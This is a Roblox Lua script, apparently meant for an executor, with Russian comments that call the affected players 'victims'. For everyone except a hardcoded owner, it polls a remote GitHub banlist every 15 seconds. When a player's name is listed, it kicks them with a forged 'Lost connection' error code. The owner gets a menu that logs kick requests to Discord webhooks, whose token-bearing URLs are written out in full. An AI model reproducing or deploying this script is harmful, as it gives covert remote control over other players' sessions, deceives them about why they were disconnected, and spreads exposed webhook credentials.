-- [[ CONFIG ]]
local OWNER_NICK = "CTO100EMM"
local GIST_URL = "https://raw.github.com/AstrodiR2/banlist.txt/main/banlist.txt" -- Ссылка на твой файл GitHub Raw

local LOGS_WEBHOOK = "https://discord.com/api/webhooks/1474931015016251424/8J-7igXshthlg1XZEwD0lVXqeZcKAt28A5rdrF0oz1XYVnnF5e5ljW_T63MIeZdX0lUc"
local KICK_WEBHOOK = "https://discord.com/api/webhooks/1475887754993729548/2cR5uNikwoCaE2RI1NddCdw9e_Npw9FKlcRCI7TslKwEDnWIWZk9kZJBVzDuH8vsULol"

local Players = game:GetService("Players")
local HttpService = game:GetService("HttpService")
local CoreGui = game:GetService("CoreGui")
local lp = Players.LocalPlayer

-- [[ 1. ПРОВЕРКА УДАЛЕННОГО КИКА (ДЛЯ ЖЕРТВЫ) ]]
if lp.Name ~= OWNER_NICK then
    task.spawn(function()
        while task.wait(15) do -- Проверка каждые 15 секунд
            local success, content = pcall(function()
                return game:HttpGet(GIST_URL .. "?t=" .. os.time()) -- Добавка времени, чтобы не было кеша
            end)
            
            if success and content:find(lp.Name) then
                lp:Kick("\n\nLost connection to the game server.\n(Error Code: 277)")
            end
        end
    end)
end

-- [[ 2. ТВОЕ МЕНЮ ]]
if lp.Name == OWNER_NICK then
    local sg = Instance.new("ScreenGui", CoreGui); sg.Name = "QuantumRemote"
    local main = Instance.new("Frame", sg)
    main.Size = UDim2.new(0, 200, 0, 100); main.Position = UDim2.new(0.5, -100, 0.2, 0)
    main.BackgroundColor3 = Color3.fromRGB(20, 20, 20); main.Active = true; main.Draggable = true
    Instance.new("UICorner", main)

    local inp = Instance.new("TextBox", main)
    inp.Size = UDim2.new(0.85, 0, 0, 30); inp.Position = UDim2.new(0.075, 0, 0.2, 0)
    inp.PlaceholderText = "Ник для кика..."
    
    local btn = Instance.new("TextButton", main)
    btn.Size = UDim2.new(0.85, 0, 0, 30); btn.Position = UDim2.new(0.075, 0, 0.6, 0)
    btn.Text = "SEND REQUEST"
    btn.BackgroundColor3 = Color3.fromRGB(150, 0, 0); btn.TextColor3 = Color3.new(1,1,1)

    btn.MouseButton1Click:Connect(function()
        if inp.Text ~= "" then
            -- Отправляем сигнал в Дискорд, чтобы ты знал, кого кикаешь
            local proxyURL = KICK_WEBHOOK:gsub("discord.com", "webhook.lewisakura.moe")
            pcall(function()
                HttpService:PostAsync(proxyURL, HttpService:JSONEncode({
                    ["content"] = "📢 **ЗАПРОС**: Добавь `" .. inp.Text .. "` в GitHub Gist, чтобы кикнуть!"
                }))
            end)
            btn.Text = "LOGGED!"; task.wait(1); btn.Text = "SEND REQUEST"
        end
    end)
end
